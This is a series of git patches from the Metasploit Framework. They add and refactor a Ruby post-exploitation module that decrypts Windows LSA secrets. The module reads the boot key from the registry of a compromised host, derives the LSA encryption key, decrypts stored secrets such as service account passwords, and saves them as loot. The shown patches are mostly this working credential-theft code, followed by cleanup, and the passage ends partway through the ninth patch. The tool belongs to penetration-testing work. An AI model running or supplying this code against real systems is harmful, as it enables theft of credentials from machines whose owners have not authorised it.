From c59bdbf52ef72ca9c1c8c45aac6e6d323cc5636f Mon Sep 17 00:00:00 2001
From: Rob Fuller <jd.mubix@gmail.com>
Date: Wed, 16 Oct 2013 22:10:22 -0400
Subject: [PATCH 001/217] move Rob Bathurst enum_lsa module in from the
 unstable cold

---
 .../post/windows/gather/credentials/lsa.rb    | 299 ++++++++++++++++++
 1 file changed, 299 insertions(+)
 create mode 100644 modules/post/windows/gather/credentials/lsa.rb

diff --git a/modules/post/windows/gather/credentials/lsa.rb b/modules/post/windows/gather/credentials/lsa.rb
new file mode 100644
index 0000000000..8730555bbc
--- /dev/null
+++ b/modules/post/windows/gather/credentials/lsa.rb
@@ -0,0 +1,299 @@
+##
+# $Id: enum_lsa.rb 15362 2012-04-21 rob $
+##
+
+require 'msf/core'
+require 'msf/core/post/windows/priv'
+require 'msf/core/post/common'
+require 'msf/core/post/windows/registry'
+
+class Metasploit3 < Msf::Post
+  include Msf::Post::Windows::Priv
+  include Msf::Post::Common
+  include Msf::Post::Windows::Registry
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'            => "Windows Enumerate LSA Secrets",
+      'Description'     => %q{
+        This module will attempt to enumerate the LSA Secrets keys within the registry. The registry value used is:
+        HKEY_LOCAL_MACHINE\\Security\\Policy\\Secrets\\. Thanks goes to Maurizio Agazzini and Mubix for decrypt
+        code from cachedump.
+        },
+      'License'         => MSF_LICENSE,
+      'Platform'        => ['win'],
+      'SessionTypes'    => ['meterpreter'],
+      'Author'          => ['Rob Bathurst <rob.bathurst@foundstone.com>']
+    ))
+  end
+
+  def capture_boot_key
+    bootkey = ""
+    basekey = "System\\CurrentControlSet\\Control\\Lsa"
+
+    %W{JD Skew1 GBG Data}.each do |k|
+      ok = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, basekey + "\\" + k, KEY_READ)
+      return nil if not ok
+      bootkey << [ok.query_class.to_i(16)].pack("V")
+      ok.close
+    end
+
+    keybytes = bootkey.unpack("C*")
+    descrambled = ""
+    descrambler = [ 0x0b, 0x06, 0x07, 0x01, 0x08, 0x0a, 0x0e, 0x00, 0x03, 0x05, 0x02, 0x0f, 0x0d, 0x09, 0x0c, 0x04 ]
+
+    0.upto(keybytes.length-1) do |x|
+      descrambled << [keybytes[descrambler[x]]].pack("C")
+    end
+
+    return descrambled
+  end
+
+  def capture_lsa_key(bootkey)
+    begin
+      #print_status("Getting PolSecretEncryptionKey...")
+      ok = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, "SECURITY\\Policy\\PolSecretEncryptionKey", KEY_READ)
+      pol = ok.query_value("").data
+      #print_status("Got PolSecretEncryptionKey: #{pol.unpack("H*")[0]}")
+      ok.close
+      print_status("XP compatible client")
+      @vista = 0
+    rescue
+      #print_status("Trying 'V72' style...")
+      #print_status("Getting PolEKList...")
+      ok = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, "SECURITY\\Policy\\PolEKList", KEY_READ)
+      pol = ok.query_value("").data
+      #print_good("Pol: #{pol.unpack("H*")[0]}")
+      ok.close
+      print_status("V/7/2k8 compatible client")
+      @vista = 1
+    end
+
+    if( @vista == 1 )
+      lsakey = decrypt_lsa(pol, bootkey)
+      lsakey = lsakey[68,32]
+      #print_good(lsakey.unpack("H*")[0])
+    else
+      md5x = Digest::MD5.new()
+      md5x << bootkey
+      (1..1000).each do
+        md5x << pol[60,16]
+      end
+
+      rc4 = OpenSSL::Cipher::Cipher.new("rc4")
+      rc4.key = md5x.digest
+      lsakey  = rc4.update(pol[12,48])
+      lsakey << rc4.final
+      lsakey = lsakey[0x10..0x1F]
+    end
+    return lsakey
+  end
+
+  def convert_des_56_to_64(kstr)
+    des_odd_parity = [
+      1, 1, 2, 2, 4, 4, 7, 7, 8, 8, 11, 11, 13, 13, 14, 14,
+      16, 16, 19, 19, 21, 21, 22, 22, 25, 25, 26, 26, 28, 28, 31, 31,
+      32, 32, 35, 35, 37, 37, 38, 38, 41, 41, 42, 42, 44, 44, 47, 47,
+      49, 49, 50, 50, 52, 52, 55, 55, 56, 56, 59, 59, 61, 61, 62, 62,
+      64, 64, 67, 67, 69, 69, 70, 70, 73, 73, 74, 74, 76, 76, 79, 79,
+      81, 81, 82, 82, 84, 84, 87, 87, 88, 88, 91, 91, 93, 93, 94, 94,
+      97, 97, 98, 98,100,100,103,103,104,104,107,107,109,109,110,110,
+      112,112,115,115,117,117,118,118,121,121,122,122,124,124,127,127,
+      128,128,131,131,133,133,134,134,137,137,138,138,140,140,143,143,
+      145,145,146,146,148,148,151,151,152,152,155,155,157,157,158,158,
+      161,161,162,162,164,164,167,167,168,168,171,171,173,173,174,174,
+      176,176,179,179,181,181,182,182,185,185,186,186,188,188,191,191,
+      193,193,194,194,196,196,199,199,200,200,203,203,205,205,206,206,
+      208,208,211,211,213,213,214,214,217,217,218,218,220,220,223,223,
+      224,224,227,227,229,229,230,230,233,233,234,234,236,236,239,239,
+      241,241,242,242,244,244,247,247,248,248,251,251,253,253,254,254
+    ]
+
+    key = []
+    str = kstr.unpack("C*")
+
+    key[0] = str[0] >> 1
+    key[1] = ((str[0] & 0x01) << 6) | (str[1] >> 2)
+    key[2] = ((str[1] & 0x03) << 5) | (str[2] >> 3)
+    key[3] = ((str[2] & 0x07) << 4) | (str[3] >> 4)
+    key[4] = ((str[3] & 0x0F) << 3) | (str[4] >> 5)
+    key[5] = ((str[4] & 0x1F) << 2) | (str[5] >> 6)
+    key[6] = ((str[5] & 0x3F) << 1) | (str[6] >> 7)
+    key[7] = str[6] & 0x7F
+
+    0.upto(7) do |i|
+      key[i] = ( key[i] << 1)
+      key[i] = des_odd_parity[key[i]]
+    end
+    return key.pack("C*")
+  end
+
+
+  def decrypt_secret(secret, key)
+
+    # Ruby implementation of SystemFunction005
+    # the original python code has been taken from Credump
+
+    j = 0
+    decrypted_data = ''
+
+    for i in (0...secret.length).step(8)
+      enc_block = secret[i..i+7]
+      block_key = key[j..j+6]
+      des_key = convert_des_56_to_64(block_key)
+      d1 = OpenSSL::Cipher::Cipher.new('des-ecb')
+
+      d1.padding = 0
+      d1.key = des_key
+      d1o = d1.update(enc_block)
+      d1o << d1.final
+      decrypted_data += d1o
+      j += 7
+      if (key[j..j+7].length < 7 )
+        j = key[j..j+7].length
+      end
+    end
+    dec_data_len = decrypted_data[0].ord
+
+    return decrypted_data[8..8+dec_data_len]
+
+  end
+
+  def decrypt_lsa(pol, encryptedkey)
+
+    sha256x = Digest::SHA256.new()
+    sha256x << encryptedkey
+    (1..1000).each do
+      sha256x << pol[28,32]
+    end
+
+    aes = OpenSSL::Cipher::Cipher.new("aes-256-cbc")
+    aes.key = sha256x.digest
+
+    #print_status("digest #{sha256x.digest.unpack("H*")[0]}")
+
+    decryptedkey = ''
+
+    for i in (60...pol.length).step(16)
+      aes.decrypt
+      aes.padding = 0
+      xx = aes.update(pol[i...i+16])
+      decryptedkey += xx
+    end
+    #print_good("Dec_Key #{decryptedkey}")
+
+    return decryptedkey
+  end
+  def reg_getvaldata(key,valname)
+    v = nil
+    begin
+      root_key, base_key = client.sys.registry.splitkey(key)
+      open_key = client.sys.registry.open_key(root_key, base_key, KEY_READ)
+      #print("reading key: #{key}#{valname}\n")
+      v = open_key.query_value(valname).data
+      open_key.close
+    rescue
+      print_error("Error opening key!")
+    end
+    return v
+  end
+  #Decrypted LSA key is passed into this function
+  def get_secret(lkey)
+    sec_str = "\n"
+    begin
+      #LSA Secret key location within the register
+      root_key = "HKEY_LOCAL_MACHINE\\Security\\Policy\\Secrets\\"
+      begin
+        key_arr = meterpreter_registry_enumkeys(root_key)
+        key_arr.each do |keys|
+          begin
+            mid_key = root_key + "\\" +  keys
+            sk_arr = meterpreter_registry_enumkeys(mid_key)
+            sk_arr.each do |mkeys|
+              begin
+                #CurrVal stores the currently set value of the key, in the case of
+                #services it usually come out as plan text
+                if(mkeys == "CurrVal")
+                  val_key = root_key + "\\" + keys + "\\" + mkeys
+                  v_name = ""
+                  sec = reg_getvaldata(val_key, v_name)
+                  if( @vista == 1 )
+                    #Magic happens here
+                    sec = sec[0..-1]
+                    sec = decrypt_lsa(sec, lkey)[1..-1].scan(/[[:print:]]/).join
+                  else
+                    #and here
+                    sec = sec[0xC..-1]
+                    sec = decrypt_secret(sec, lkey).scan(/[[:print:]]/).join
+                  end
+                  if(sec.length > 0)
+                    if(keys[0,4] == "_SC_")
+                      user_key = "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\"
+                      keys_c = keys[4,keys.length]
+                      user_key = user_key << keys_c
+                      n_val = "ObjectName"
+                      user_n = reg_getvaldata(user_key, n_val)
+
+                      #if the unencrypted value is not blank and is a service, print
+                      print_good("Key: #{keys} \n Username: #{user_n} \n Decrypted Value: #{sec}\n")
+                      sec_str = sec_str << "Key: #{keys} \n Username: #{user_n} \n Decrypted Value: #{sec}\n"
+                    else
+                      #if the unencrypted value is not blank, print
+                      print_good("Key: #{keys} \n Decrypted Value: #{sec}\n")
+                      sec_str = sec_str << "Key: #{keys} \n Decrypted Value: #{sec}\n"
+                    end
+                  end
+                else
+                  next
+                end
+              rescue ::Exception => e
+                print_error("Unable to open: #{val_key}")
+                print_error("Error: #{e.class} #{e}")
+              end
+            end
+          rescue
+            print_error("Unable to open: #{mid_key}")
+          end
+        end
+      rescue ::Exception => e
+        print_error("Unable to open: #{root_key}")
+        print_error("Error: #{e.class} #{e}")
+      end
+    rescue
+      print_error("Cannot find key.")
+    end
+  return sec_str
+  end
+
+  # The sauce starts here
+  def run
+
+    hostname = session.sys.config.sysinfo['Computer']
+    print_status("Executing module against #{hostname}")
+
+    print_status('Obtaining boot key...')
+    bootkey = capture_boot_key
+    vprint_status("Boot key: #{bootkey.unpack("H*")[0]}")
+
+    print_status('Obtaining Lsa key...')
+    lsakey = capture_lsa_key(bootkey)
+    vprint_status("Lsa Key: #{lsakey.unpack("H*")[0]}")
+
+    client.railgun.netapi32()
+    begin
+      secrets = hostname << get_secret(lsakey)
+      print_status("Writing to loot...")
+      path = store_loot(
+        'registry.lsa.sec',
+        'text/plain',
+        session,
+        secrets,
+        'reg_lsa_secrts.txt',
+        'Registry LSA Secret Decrypted File')
+      print_status("Data saved in: #{path}")
+    rescue ::Exception => e
+      print_error("Failed to run LSA Enum")
+      print_error("Error: #{e.class} #{e}")
+    end
+  end
+end

From b42687151f3da0053d936aa29c810472ac70b7c1 Mon Sep 17 00:00:00 2001
From: Rob Fuller <jd.mubix@gmail.com>
Date: Wed, 16 Oct 2013 22:14:55 -0400
Subject: [PATCH 002/217] convert from tabs to spaces

---
 .../post/windows/gather/credentials/lsa.rb    | 24 +++++++++----------
 1 file changed, 11 insertions(+), 13 deletions(-)

diff --git a/modules/post/windows/gather/credentials/lsa.rb b/modules/post/windows/gather/credentials/lsa.rb
index 8730555bbc..e81895af58 100644
--- a/modules/post/windows/gather/credentials/lsa.rb
+++ b/modules/post/windows/gather/credentials/lsa.rb
@@ -17,16 +17,16 @@ class Metasploit3 < Msf::Post
       'Name'            => "Windows Enumerate LSA Secrets",
       'Description'     => %q{
         This module will attempt to enumerate the LSA Secrets keys within the registry. The registry value used is:
-        HKEY_LOCAL_MACHINE\\Security\\Policy\\Secrets\\. Thanks goes to Maurizio Agazzini and Mubix for decrypt
+        HKEY_LOCAL_MACHINE\\Security\\Policy\\Secrets\\. Thanks goes to Maurizio Agazzini and Mubix for decrypt 
         code from cachedump.
         },
       'License'         => MSF_LICENSE,
+      'Version'         => '$Revision: 15362 $',
       'Platform'        => ['win'],
       'SessionTypes'    => ['meterpreter'],
       'Author'          => ['Rob Bathurst <rob.bathurst@foundstone.com>']
     ))
   end
-
   def capture_boot_key
     bootkey = ""
     basekey = "System\\CurrentControlSet\\Control\\Lsa"
@@ -211,7 +211,7 @@ class Metasploit3 < Msf::Post
             sk_arr = meterpreter_registry_enumkeys(mid_key)
             sk_arr.each do |mkeys|
               begin
-                #CurrVal stores the currently set value of the key, in the case of
+                #CurrVal stores the currently set value of the key, in the case of 
                 #services it usually come out as plan text
                 if(mkeys == "CurrVal")
                   val_key = root_key + "\\" + keys + "\\" + mkeys
@@ -226,7 +226,7 @@ class Metasploit3 < Msf::Post
                     sec = sec[0xC..-1]
                     sec = decrypt_secret(sec, lkey).scan(/[[:print:]]/).join
                   end
-                  if(sec.length > 0)
+                  if(sec.length > 0) 
                     if(keys[0,4] == "_SC_")
                       user_key = "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\"
                       keys_c = keys[4,keys.length]
@@ -241,7 +241,7 @@ class Metasploit3 < Msf::Post
                       #if the unencrypted value is not blank, print
                       print_good("Key: #{keys} \n Decrypted Value: #{sec}\n")
                       sec_str = sec_str << "Key: #{keys} \n Decrypted Value: #{sec}\n"
-                    end
+                    end                 
                   end
                 else
                   next
@@ -262,26 +262,24 @@ class Metasploit3 < Msf::Post
     rescue
       print_error("Cannot find key.")
     end
-  return sec_str
+  return sec_str 
   end
 
   # The sauce starts here
   def run
-
-    hostname = session.sys.config.sysinfo['Computer']
-    print_status("Executing module against #{hostname}")
-
     print_status('Obtaining boot key...')
     bootkey = capture_boot_key
-    vprint_status("Boot key: #{bootkey.unpack("H*")[0]}")
+    #print_status("Boot key: #{bootkey.unpack("H*")[0]}") 
 
     print_status('Obtaining Lsa key...')
     lsakey = capture_lsa_key(bootkey)
-    vprint_status("Lsa Key: #{lsakey.unpack("H*")[0]}")
+    #print_status("Lsa Key: #{lsakey.unpack("H*")[0]}") 
 
+    hostname = session.sys.config.sysinfo['Computer']
+    print_status("Executing module against #{hostname}")
     client.railgun.netapi32()
     begin
-      secrets = hostname << get_secret(lsakey)
+      secrets = hostname << get_secret(lsakey)      
       print_status("Writing to loot...")
       path = store_loot(
         'registry.lsa.sec',

From 2fbd7ea0ba91ba3923eba421adaf7c43cfa530ce Mon Sep 17 00:00:00 2001
From: Rob Fuller <jd.mubix@gmail.com>
Date: Wed, 16 Oct 2013 22:17:05 -0400
Subject: [PATCH 003/217] msftidy up

---
 modules/post/windows/gather/credentials/lsa.rb | 16 ++++++++--------
 1 file changed, 8 insertions(+), 8 deletions(-)

diff --git a/modules/post/windows/gather/credentials/lsa.rb b/modules/post/windows/gather/credentials/lsa.rb
index e81895af58..f093a5b9d4 100644
--- a/modules/post/windows/gather/credentials/lsa.rb
+++ b/modules/post/windows/gather/credentials/lsa.rb
@@ -17,7 +17,7 @@ class Metasploit3 < Msf::Post
       'Name'            => "Windows Enumerate LSA Secrets",
       'Description'     => %q{
         This module will attempt to enumerate the LSA Secrets keys within the registry. The registry value used is:
-        HKEY_LOCAL_MACHINE\\Security\\Policy\\Secrets\\. Thanks goes to Maurizio Agazzini and Mubix for decrypt 
+        HKEY_LOCAL_MACHINE\\Security\\Policy\\Secrets\\. Thanks goes to Maurizio Agazzini and Mubix for decrypt
         code from cachedump.
         },
       'License'         => MSF_LICENSE,
@@ -211,7 +211,7 @@ class Metasploit3 < Msf::Post
             sk_arr = meterpreter_registry_enumkeys(mid_key)
             sk_arr.each do |mkeys|
               begin
-                #CurrVal stores the currently set value of the key, in the case of 
+                #CurrVal stores the currently set value of the key, in the case of
                 #services it usually come out as plan text
                 if(mkeys == "CurrVal")
                   val_key = root_key + "\\" + keys + "\\" + mkeys
@@ -226,7 +226,7 @@ class Metasploit3 < Msf::Post
                     sec = sec[0xC..-1]
                     sec = decrypt_secret(sec, lkey).scan(/[[:print:]]/).join
                   end
-                  if(sec.length > 0) 
+                  if(sec.length > 0)
                     if(keys[0,4] == "_SC_")
                       user_key = "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\"
                       keys_c = keys[4,keys.length]
@@ -241,7 +241,7 @@ class Metasploit3 < Msf::Post
                       #if the unencrypted value is not blank, print
                       print_good("Key: #{keys} \n Decrypted Value: #{sec}\n")
                       sec_str = sec_str << "Key: #{keys} \n Decrypted Value: #{sec}\n"
-                    end                 
+                    end
                   end
                 else
                   next
@@ -262,24 +262,24 @@ class Metasploit3 < Msf::Post
     rescue
       print_error("Cannot find key.")
     end
-  return sec_str 
+  return sec_str
   end
 
   # The sauce starts here
   def run
     print_status('Obtaining boot key...')
     bootkey = capture_boot_key
-    #print_status("Boot key: #{bootkey.unpack("H*")[0]}") 
+    #print_status("Boot key: #{bootkey.unpack("H*")[0]}")
 
     print_status('Obtaining Lsa key...')
     lsakey = capture_lsa_key(bootkey)
-    #print_status("Lsa Key: #{lsakey.unpack("H*")[0]}") 
+    #print_status("Lsa Key: #{lsakey.unpack("H*")[0]}")
 
     hostname = session.sys.config.sysinfo['Computer']
     print_status("Executing module against #{hostname}")
     client.railgun.netapi32()
     begin
-      secrets = hostname << get_secret(lsakey)      
+      secrets = hostname << get_secret(lsakey)
       print_status("Writing to loot...")
       path = store_loot(
         'registry.lsa.sec',

From f672e2075b3f17878661a575be53280b55a2e0f8 Mon Sep 17 00:00:00 2001
From: Rob Fuller <jd.mubix@gmail.com>
Date: Wed, 16 Oct 2013 22:18:24 -0400
Subject: [PATCH 004/217] get rid of ID and Version

---
 modules/post/windows/gather/credentials/lsa.rb | 6 ++++--
 1 file changed, 4 insertions(+), 2 deletions(-)

diff --git a/modules/post/windows/gather/credentials/lsa.rb b/modules/post/windows/gather/credentials/lsa.rb
index f093a5b9d4..d085510f0e 100644
--- a/modules/post/windows/gather/credentials/lsa.rb
+++ b/modules/post/windows/gather/credentials/lsa.rb
@@ -1,5 +1,8 @@
 ##
-# $Id: enum_lsa.rb 15362 2012-04-21 rob $
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
 ##
 
 require 'msf/core'
@@ -21,7 +24,6 @@ class Metasploit3 < Msf::Post
         code from cachedump.
         },
       'License'         => MSF_LICENSE,
-      'Version'         => '$Revision: 15362 $',
       'Platform'        => ['win'],
       'SessionTypes'    => ['meterpreter'],
       'Author'          => ['Rob Bathurst <rob.bathurst@foundstone.com>']

From ca88c071cf2a1bc239b37859d91b9060a2bbdb92 Mon Sep 17 00:00:00 2001
From: Rob Fuller <jd.mubix@gmail.com>
Date: Wed, 16 Oct 2013 22:20:21 -0400
Subject: [PATCH 005/217] remove unneeded railgun call and make vprints out of
 commented puts

---
 modules/post/windows/gather/credentials/lsa.rb | 17 +++++++++--------
 1 file changed, 9 insertions(+), 8 deletions(-)

diff --git a/modules/post/windows/gather/credentials/lsa.rb b/modules/post/windows/gather/credentials/lsa.rb
index d085510f0e..82b4dee3f0 100644
--- a/modules/post/windows/gather/credentials/lsa.rb
+++ b/modules/post/windows/gather/credentials/lsa.rb
@@ -269,17 +269,18 @@ class Metasploit3 < Msf::Post
 
   # The sauce starts here
   def run
-    print_status('Obtaining boot key...')
-    bootkey = capture_boot_key
-    #print_status("Boot key: #{bootkey.unpack("H*")[0]}")
-
-    print_status('Obtaining Lsa key...')
-    lsakey = capture_lsa_key(bootkey)
-    #print_status("Lsa Key: #{lsakey.unpack("H*")[0]}")
 
     hostname = session.sys.config.sysinfo['Computer']
     print_status("Executing module against #{hostname}")
-    client.railgun.netapi32()
+
+    print_status('Obtaining boot key...')
+    bootkey = capture_boot_key
+    vprint_status("Boot key: #{bootkey.unpack("H*")[0]}")
+
+    print_status('Obtaining Lsa key...')
+    lsakey = capture_lsa_key(bootkey)
+    vprint_status("Lsa Key: #{lsakey.unpack("H*")[0]}")
+
     begin
       secrets = hostname << get_secret(lsakey)
       print_status("Writing to loot...")

From b2235049804120f15ef82192939b1c7f47f6b950 Mon Sep 17 00:00:00 2001
From: Rob Fuller <jd.mubix@gmail.com>
Date: Wed, 16 Oct 2013 22:22:45 -0400
Subject: [PATCH 006/217] clean up run code - remove catchall rescue

---
 .../post/windows/gather/credentials/lsa.rb    | 27 +++++++++----------
 1 file changed, 13 insertions(+), 14 deletions(-)

diff --git a/modules/post/windows/gather/credentials/lsa.rb b/modules/post/windows/gather/credentials/lsa.rb
index 82b4dee3f0..893f7984ba 100644
--- a/modules/post/windows/gather/credentials/lsa.rb
+++ b/modules/post/windows/gather/credentials/lsa.rb
@@ -281,20 +281,19 @@ class Metasploit3 < Msf::Post
     lsakey = capture_lsa_key(bootkey)
     vprint_status("Lsa Key: #{lsakey.unpack("H*")[0]}")
 
-    begin
-      secrets = hostname << get_secret(lsakey)
-      print_status("Writing to loot...")
-      path = store_loot(
-        'registry.lsa.sec',
-        'text/plain',
-        session,
-        secrets,
-        'reg_lsa_secrts.txt',
-        'Registry LSA Secret Decrypted File')
+    secrets = hostname << get_secret(lsakey)
+
+    print_status("Writing to loot...")
+
+    path = store_loot(
+      'registry.lsa.sec',
+      'text/plain',
+      session,
+      secrets,
+      'reg_lsa_secrts.txt',
+      'Registry LSA Secret Decrypted File'
+      )
+
       print_status("Data saved in: #{path}")
-    rescue ::Exception => e
-      print_error("Failed to run LSA Enum")
-      print_error("Error: #{e.class} #{e}")
-    end
   end
 end

From 1a85bd22a8f92be08d86df1db00f00b351e44624 Mon Sep 17 00:00:00 2001
From: Rob Fuller <jd.mubix@gmail.com>
Date: Wed, 16 Oct 2013 22:46:15 -0400
Subject: [PATCH 007/217] move capture_boot_key to post win priv

---
 lib/msf/core/post/windows/priv.rb             | 25 +++++++++++++++++++
 .../post/windows/gather/credentials/lsa.rb    | 21 ----------------
 2 files changed, 25 insertions(+), 21 deletions(-)

diff --git a/lib/msf/core/post/windows/priv.rb b/lib/msf/core/post/windows/priv.rb
index 22381044f6..689574f20c 100644
--- a/lib/msf/core/post/windows/priv.rb
+++ b/lib/msf/core/post/windows/priv.rb
@@ -84,4 +84,29 @@ module Msf::Post::Windows::Priv
     end
   end
 
+  #
+  # Returns the unscrambled bootkey
+  #
+  def capture_boot_key
+    bootkey = ""
+    basekey = "System\\CurrentControlSet\\Control\\Lsa"
+
+    %W{JD Skew1 GBG Data}.each do |k|
+      ok = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, basekey + "\\" + k, KEY_READ)
+      return nil if not ok
+      bootkey << [ok.query_class.to_i(16)].pack("V")
+      ok.close
+    end
+
+    keybytes = bootkey.unpack("C*")
+    descrambled = ""
+    descrambler = [ 0x0b, 0x06, 0x07, 0x01, 0x08, 0x0a, 0x0e, 0x00, 0x03, 0x05, 0x02, 0x0f, 0x0d, 0x09, 0x0c, 0x04 ]
+
+    0.upto(keybytes.length-1) do |x|
+      descrambled << [keybytes[descrambler[x]]].pack("C")
+    end
+
+    return descrambled
+  end
+
 end
diff --git a/modules/post/windows/gather/credentials/lsa.rb b/modules/post/windows/gather/credentials/lsa.rb
index 893f7984ba..a807aa3df7 100644
--- a/modules/post/windows/gather/credentials/lsa.rb
+++ b/modules/post/windows/gather/credentials/lsa.rb
@@ -29,27 +29,6 @@ class Metasploit3 < Msf::Post
       'Author'          => ['Rob Bathurst <rob.bathurst@foundstone.com>']
     ))
   end
-  def capture_boot_key
-    bootkey = ""
-    basekey = "System\\CurrentControlSet\\Control\\Lsa"
-
-    %W{JD Skew1 GBG Data}.each do |k|
-      ok = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, basekey + "\\" + k, KEY_READ)
-      return nil if not ok
-      bootkey << [ok.query_class.to_i(16)].pack("V")
-      ok.close
-    end
-
-    keybytes = bootkey.unpack("C*")
-    descrambled = ""
-    descrambler = [ 0x0b, 0x06, 0x07, 0x01, 0x08, 0x0a, 0x0e, 0x00, 0x03, 0x05, 0x02, 0x0f, 0x0d, 0x09, 0x0c, 0x04 ]
-
-    0.upto(keybytes.length-1) do |x|
-      descrambled << [keybytes[descrambler[x]]].pack("C")
-    end
-
-    return descrambled
-  end
 
   def capture_lsa_key(bootkey)
     begin

From 8be21a7413d5239da5564f3186483b395c839221 Mon Sep 17 00:00:00 2001
From: Rob Fuller <jd.mubix@gmail.com>
Date: Wed, 16 Oct 2013 22:58:14 -0400
Subject: [PATCH 008/217] remove the insane amount of rescues

---
 .../post/windows/gather/credentials/lsa.rb    | 111 ++++++++----------
 1 file changed, 50 insertions(+), 61 deletions(-)

diff --git a/modules/post/windows/gather/credentials/lsa.rb b/modules/post/windows/gather/credentials/lsa.rb
index a807aa3df7..c7c83a6ee9 100644
--- a/modules/post/windows/gather/credentials/lsa.rb
+++ b/modules/post/windows/gather/credentials/lsa.rb
@@ -151,7 +151,7 @@ class Metasploit3 < Msf::Post
     aes = OpenSSL::Cipher::Cipher.new("aes-256-cbc")
     aes.key = sha256x.digest
 
-    #print_status("digest #{sha256x.digest.unpack("H*")[0]}")
+    vprint_status("digest #{sha256x.digest.unpack("H*")[0]}")
 
     decryptedkey = ''
 
@@ -161,16 +161,18 @@ class Metasploit3 < Msf::Post
       xx = aes.update(pol[i...i+16])
       decryptedkey += xx
     end
-    #print_good("Dec_Key #{decryptedkey}")
+    vprint_good("Dec_Key #{decryptedkey}")
 
     return decryptedkey
   end
+
+
   def reg_getvaldata(key,valname)
     v = nil
     begin
       root_key, base_key = client.sys.registry.splitkey(key)
       open_key = client.sys.registry.open_key(root_key, base_key, KEY_READ)
-      #print("reading key: #{key}#{valname}\n")
+      vprint_status("reading key: #{key}#{valname}\n")
       v = open_key.query_value(valname).data
       open_key.close
     rescue
@@ -178,72 +180,59 @@ class Metasploit3 < Msf::Post
     end
     return v
   end
+
+
   #Decrypted LSA key is passed into this function
   def get_secret(lkey)
     sec_str = "\n"
-    begin
-      #LSA Secret key location within the register
-      root_key = "HKEY_LOCAL_MACHINE\\Security\\Policy\\Secrets\\"
-      begin
-        key_arr = meterpreter_registry_enumkeys(root_key)
-        key_arr.each do |keys|
-          begin
-            mid_key = root_key + "\\" +  keys
-            sk_arr = meterpreter_registry_enumkeys(mid_key)
-            sk_arr.each do |mkeys|
-              begin
-                #CurrVal stores the currently set value of the key, in the case of
-                #services it usually come out as plan text
-                if(mkeys == "CurrVal")
-                  val_key = root_key + "\\" + keys + "\\" + mkeys
-                  v_name = ""
-                  sec = reg_getvaldata(val_key, v_name)
-                  if( @vista == 1 )
-                    #Magic happens here
-                    sec = sec[0..-1]
-                    sec = decrypt_lsa(sec, lkey)[1..-1].scan(/[[:print:]]/).join
-                  else
-                    #and here
-                    sec = sec[0xC..-1]
-                    sec = decrypt_secret(sec, lkey).scan(/[[:print:]]/).join
-                  end
-                  if(sec.length > 0)
-                    if(keys[0,4] == "_SC_")
-                      user_key = "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\"
-                      keys_c = keys[4,keys.length]
-                      user_key = user_key << keys_c
-                      n_val = "ObjectName"
-                      user_n = reg_getvaldata(user_key, n_val)
 
-                      #if the unencrypted value is not blank and is a service, print
-                      print_good("Key: #{keys} \n Username: #{user_n} \n Decrypted Value: #{sec}\n")
-                      sec_str = sec_str << "Key: #{keys} \n Username: #{user_n} \n Decrypted Value: #{sec}\n"
-                    else
-                      #if the unencrypted value is not blank, print
-                      print_good("Key: #{keys} \n Decrypted Value: #{sec}\n")
-                      sec_str = sec_str << "Key: #{keys} \n Decrypted Value: #{sec}\n"
-                    end
-                  end
-                else
-                  next
-                end
-              rescue ::Exception => e
-                print_error("Unable to open: #{val_key}")
-                print_error("Error: #{e.class} #{e}")
-              end
+    #LSA Secret key location within the register
+    root_key = "HKEY_LOCAL_MACHINE\\Security\\Policy\\Secrets\\"
+
+    key_arr = meterpreter_registry_enumkeys(root_key)
+    key_arr.each do |keys|
+      mid_key = root_key + "\\" +  keys
+      sk_arr = meterpreter_registry_enumkeys(mid_key)
+      sk_arr.each do |mkeys|
+
+        #CurrVal stores the currently set value of the key, in the case of
+        #services it usually come out as plan text
+        if(mkeys == "CurrVal")
+          val_key = root_key + "\\" + keys + "\\" + mkeys
+          v_name = ""
+          sec = reg_getvaldata(val_key, v_name)
+          if( @vista == 1 )
+            #Magic happens here
+            sec = sec[0..-1]
+            sec = decrypt_lsa(sec, lkey)[1..-1].scan(/[[:print:]]/).join
+          else
+            #and here
+            sec = sec[0xC..-1]
+            sec = decrypt_secret(sec, lkey).scan(/[[:print:]]/).join
+          end
+
+          if(sec.length > 0)
+            if(keys[0,4] == "_SC_")
+              user_key = "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\"
+              keys_c = keys[4,keys.length]
+              user_key = user_key << keys_c
+              n_val = "ObjectName"
+              user_n = reg_getvaldata(user_key, n_val)
+
+              #if the unencrypted value is not blank and is a service, print
+              print_good("Key: #{keys} \n Username: #{user_n} \n Decrypted Value: #{sec}\n")
+              sec_str = sec_str << "Key: #{keys} \n Username: #{user_n} \n Decrypted Value: #{sec}\n"
+            else
+              #if the unencrypted value is not blank, print
+              print_good("Key: #{keys} \n Decrypted Value: #{sec}\n")
+              sec_str = sec_str << "Key: #{keys} \n Decrypted Value: #{sec}\n"
             end
-          rescue
-            print_error("Unable to open: #{mid_key}")
+          else
+            next
           end
         end
-      rescue ::Exception => e
-        print_error("Unable to open: #{root_key}")
-        print_error("Error: #{e.class} #{e}")
       end
-    rescue
-      print_error("Cannot find key.")
-    end
-  return sec_str
+    return sec_str
   end
 
   # The sauce starts here

From b318e32487f789fe66c1cdf0f51f9e499f16218d Mon Sep 17 00:00:00 2001
From: Rob Fuller <jd.mubix@gmail.com>
Date: Wed, 16 Oct 2013 23:17:20 -0400
Subject: [PATCH 009/217] removed duplicate code for capture_boot_key functions

---
 modules/post/windows/gather/cachedump.rb      | 23 +----------------
 modules/post/windows/gather/hashdump.rb       | 25 ++-----------------
 modules/post/windows/gather/smart_hashdump.rb | 23 -----------------
 3 files changed, 3 insertions(+), 68 deletions(-)

diff --git a/modules/post/windows/gather/cachedump.rb b/modules/post/windows/gather/cachedump.rb
index 795d69978e..aeb74cd770 100644
--- a/modules/post/windows/gather/cachedump.rb
